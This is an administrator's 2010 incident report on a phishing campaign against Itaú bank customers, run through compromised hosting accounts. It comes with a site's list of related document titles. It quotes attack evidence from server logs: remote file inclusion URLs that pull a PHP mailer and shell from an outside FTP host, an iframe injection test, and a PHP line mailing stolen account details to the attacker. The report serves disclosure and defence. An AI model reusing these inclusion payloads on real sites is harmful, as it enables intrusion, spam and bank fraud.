The anatomy of an online banking fraud



Similar documents
WEB ATTACKS AND COUNTERMEASURES

How to Secure TYPO3 Installations

Security from the Cloud

About Botnet, and the influence that Botnet gives to broadband ISP

THE OPEN UNIVERSITY OF TANZANIA

Joomla Admin Protection

Fraud and Abuse Policy

Overview. Common Internet Threats. Spear Phishing / Whaling. Phishing Sites. Virus: Pentagon Attack. Viruses & Worms

Using Microsoft Expression Web to Upload Your Site

Monitoring mobile communication network, how does it work? How to prevent such thing about that?

Phone Fax

ReadySpace Limited Unit J, 16/F Reason Group Tower, Castle PeakRoad, Kwai Chung, N.T.

Countermeasures against Bots

An analysis of exploitation behaviors on the web and the role of web hosting providers in detecting them

3 Marketing Security Risks. How to combat the threats to the security of your Marketing Database

BE SAFE ONLINE: Lesson Plan

BOTNETS. Douwe Leguit, Manager Knowledge Center GOVCERT.NL

GlobalSign Malware Monitoring

Using Internet or Windows Explorer to Upload Your Site

MALWARE TOOLS FOR SALE ON THE OPEN WEB

Malware Analysis Quiz 6

NUIT Tech Talk. Peeking Behind the Curtain of Security. Jeff Holland Security Vulnerability Analyst Information & Systems Security/Compliance

5. At the Windows Component panel, select the Internet Information Services (IIS) checkbox, and then hit Next.

NEW JERSEY STATE POLICE EXAMPLES OF CRIMINAL INTENT

Security workshop Protection against botnets. Belnet Aris Adamantiadis Brussels 18 th April 2013

? Walking in Light with Christ - Faith, Computing, Diary

Spyware. Michael Glenn Technology Management 2004 Qwest Communications International Inc.

Challenges and Best Practices in Fighting Financial Fraud in Brazil

Practical tips for a. Safe Christmas

100% Malware-Free A Guaranteed Approach

white paper Malware Security and the Bottom Line

Malware & Botnets. Botnets

Current counter-measures and responses by CERTs

Social Engineering Test Cases June 9th, 2009

Introduction: 1. Daily 360 Website Scanning for Malware

A briefing paper on the osconcert online ticketing system security issues, vulnerabilities and privacy concerns. OSCONCERT SECURITY AND PRIVACY.

Information Security Threat Trends

Social Engineering Toolkit

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

DON T BE FOOLED BY SPAM FREE GUIDE. Provided by: Don t Be Fooled by Spam FREE GUIDE. December 2014 Oliver James Enterprise

JOOMLA SECURITY. ireland website design. by Oliver Hummel. ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City

Dealing with spam mail

Lab 7 - Exploitation 1. NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy

Internet Security Protecting Your Business. Hayden Johnston & Rik Perry WYSCOM

Client logo placeholder XXX REPORT. Page 1 of 37

SPAM-What To Do SUMMERSET COMPUTER CLUB

What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things.

Exploiting Fundamental Weaknesses in Command and Control (C&C) Panels

CS 558 Internet Systems and Technologies

UNMASKCONTENT: THE CASE STUDY

Operation Liberpy : Keyloggers and information theft in Latin America

Security Incidents And Trends In Croatia. Domagoj Klasić

General Service Level Agreement

Almost 400 million people 1 fall victim to cybercrime every year.

isheriff CLOUD SECURITY

The Essentials Series. PCI Compliance. sponsored by. by Rebecca Herold

SECURING INFORMATION SYSTEMS

Phishing Past, Present and Future

Lesson 7 - Website Administration

Applying the 80/20 approach for Operational Excellence. How to combat new age threats, optimize investments and increase security.

Advanced Persistent Threats

ONLINE RECONNAISSANCE

How can I keep my account safe from hackers, scammers and spammers?

Still Aren't Doing. Frank Kim

Networks and Security Lab. Network Forensics

Security Analytics for Smart Grid

Terms and Conditions. Acceptable Use Policy Introduction. Compliance with UK Law. Compliance with foreign law

Security Fort Mac

A TASTE OF HTTP BOTNETS

Content Management System

Matrix Technical Support Mailer - 72 Procedure for Image Upload through Server in SATATYA DVR,NVR & HVR

Using big data analytics to identify malicious content: a case study on spam s

Computers Basic Training recruits are provided access to a computer lab for completion of work assignments. Recruits may choose to bring a laptop or

CYBER SECURITY. II. SCANDALOUS HACKINGS To show the seriousness of hacking we have included some very scandalous hacking incidences.

DDoS Attacks: The Latest Threat to Availability. Dr. Bill Highleyman Managing Editor Availability Digest

FORBIDDEN - Ethical Hacking Workshop Duration

How To Manage Web Content Management System (Wcm)

Detecting Botnets with NetFlow

Acceptable Use Policy

Broadband Acceptable Use Policy

ASL IT Security Advanced Web Exploitation Kung Fu V2.0

Cyber Security Awareness. Internet Safety Intro.

WHY DOES MY SPEED MONITORING GRAPH SHOW -1 IN THE TOOLTIP? 2 HOW CAN I CHANGE MY PREFERENCES FOR UPTIME AND SPEED MONITORING 2

INTERNET & COMPUTER SECURITY March 20, Scoville Library. ccayne@biblio.org

Top tips for improved network security

LETABA WIRELESS INTERNET CC ACCEPTABLE USE POLICY

MITB Grabbing Login Credentials

USING SEARCH ENGINES TO ACQUIRE NETWORK FORENSIC EVIDENCE

(For purposes of this Agreement, "You", " users", and "account holders" are used interchangeably, and where applicable).

Introduction Connecting Via FTP Where do I upload my website? What to call your home page? Troubleshooting FTP...

Ethical Hacking & Cyber Security Workshop

Scams and Schemes. objectives. Essential Question: What is identity theft, and how can you protect yourself from it? Learning Overview and Objectives

Attacks from the Inside

Advancements in Botnet Attacks and Malware Distribution

WHITE PAPER. The Cost of Phishing: Understanding the True Cost Dynamics Behind Phishing Attacks

Fraud Detection and Prevention. Timothy P. Minahan Vice President Government Banking TD Bank

Versafe TotALL Online Fraud Protection

Doyourwebsitebot defensesaddressthe changingthreat landscape?

BotNets- Cyber Torrirism

Phishing Scams Security Update Best Practices for General User

Transcription:

The anatomy of an online banking fraud or: Harvesting bank account data By Valentin Höbel. Mail to valentin@xenuser.org (March2010) I. What this document is about II. Introduction III. The anatomy of an online banking fraud IV. What to do now V. Additional information Page 1

I. What this document is about This file documents the case of an online banking fraud, bank account data harvesting and hacking various webspace accounts of private individuals and companies. The attacker(s) hacked various webspace accounts - being hosted by different companies - and uploaded malware (including trojans), IRC bots, content for phishing mails, PHP mailers and some other stuff. Afterwards vulnerable websites were abused to either include the PHP mailer and send out massive spam via sendmail or were modified to download a trojan automatically. The spam mails included phishing attempts which focused on customers of the Brazilian bank itaú. This document was written to show how the attacker proceeded and to help the victims to avoid such incidents in the future. Screenshot of the bank's website. The phishing mail copied it's layout. Page 2

II. Introduction When I entered the office and accessed my mail account during a normal workday at the beginning of March, I noticed various e-mails from different spamlists and our monitoring system. The messages showed that one of our shared hosting servers sent out ten of thousands of mails during the morning. After having investigated a little bit, I noticed that all those mails were sent out with the help of a PHP script which was owned by a certain user. At this point of time, the server was still sending out several e-mails per second, most of them were addressed to user@some-domains.pt and.com recipients. III. The anatomy of an online banking fraud Fortunately one of the blacklists notifying us showed us an example of an as a spam mail declared mail. It clearly shows the typical characteristics of a phishing message and copies the layout of the brazilian bank website. The text is written in Portuguese and wants the user to download a new version of their itoken software. The link to the software shows http://bankline.itau.com.br/atualizaçaoitoken/itoken_v2.07 but points to the URL http://www.dtpl.ru/jpeg/atualizar-token.php?versao2.25. You can imagine what this itoken software really is. (Phishing mail, viewed with roundcube.) After knowing those facts I tried to find the script being responsible for sending out the mails. Sadly checking the open connections, currently used scripts and looking at the webspace package of the customer brought no results. I started to look at the customer's website while trying to contact him at the same time. Page 3

It turned out that the customer was already aware of this issue and detected a vulnerability in the index.php file of his website. I looked at his website and detected several possibilities how to compromise the start page. The URL of this site is: http://www.some-domain.tld/index.php?page=start It was obvious that the detected vulnerability might be assignable to the category Remote File Inclusion. Some quick tests shows that implementing JavaScript and iframes into the website is not very difficult: http://www.some-domain.tld/index.php?page=<iframe src= http://www.google.de ></iframe> The access log file of the webserver confirmed the assumption that the attacker simply included a php mailer into the victim's website and sent out the mails via sendmail (installed server software). In addition, the PHP temp directory of this user contained three e-mail address database files in total 3 x 3000 recipients were listed there. Since the files were located at a temp dir, they must have been created or uploaded by the script. The log file of the webserver showed that the attacker included the PHP mailer via FTP: http://www.some-domain.tld/index.php? page=ftp://user:password@victom.com/images/botao.php http://www.some-domain.tld/index.php?page=ftp://user:password@victim.com/jm.php? http://www.another-victim.com/manual/cvs/.../rhe.ganteng? &action=upload&chdir=absolute_path_to_the_customer_s_website_dir_on_our_server It doesn't take many attempts to guess what those scripts are doing. The funny part about this is that the attacker revealed his malware containers to us: Those FTP URLs point to compromised webspace packages which serve as malware containers for our attacker. I connected to one of them and found the tools, trojans and PHP mailer he used. The file jm.php contains a PHP shell and a common PHP mailer and also the e-mail address of someone receiving information about the hacked webspace packages: $to = ("attacker-censored@yahoo.co.id"); Page 4

$subject = ("subject-censored!"); mail($to,$subject,$psn,$header); I also found some information about certain IRC bots this person is using. This bot also contains the ability to send out e-mails via hacked webspace packages, the information about the used IRC server, the channel, port, nicknames etc. I personally like the part about this e-mail address more. The owners of the hacked webspace packages I found are private individuals, artists and companies. Some of those websites look like websites of big companies which never can be used to host malware. Sadly they do. IV. What to do now We now should try to contact the recipients of the phishing mails, the owners and hosting companies of the compromised webspace accounts, Yahoo and of course the bank itself. Maybe one of them tries to find out who this attacker really is. We fortunately got one of his e- mail addresses which maybe leads to a correct IP address if someone takes legal steps and contacts Yahoo. I personally will send out abuse reports, a short report to the bank and try to contact various organisations which help to fight online banking fraud criminals. This attacker clearly tried to infect the bank customers' PCs with malware, normally those tools are used to harvest bank account data like the login, password and even unique money transfer codes. There are scenarios existing which contain that an infected user tries to visit the bank's website, logs in and enters sensitive information. The trojan makes the user believe that he just performed some actions successfully while in fact the trojan sends the data to a specific server and shows the user a fake bank website. The attacker now has the login data and even unique codes which can be used to transfer the victim's money away. For me, this is a clearly a criminal attempt to optain sensitive data and money. V. Additional information This document was written in order to help the victims and make them aware of the security risks they face every day, no matter if they are just normal consumers or even host their own websites. The purpose of this document is not to reveal sensitive information or to show step-by-step how to harvest bank account data. Page 5

I got some lists of e-mail addresses which received phishing mails, I got various files from one of the hacked webspace packages and the e-mail address of the attacker. Please contact me if you are a security devision of some institution and want to take (legal) steps against this attacker. I am willing to help out in order to warn the victims and to stop this attacker from performing such crimes. Page 6

Another PHP mailer being used by the attacker. Files containing 9 000 e-mail addresses. You may publish this document and copy stuff in any way you like. Valentin Höbel valentin@xenuser.org http://www.xenuser.org Page 7

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information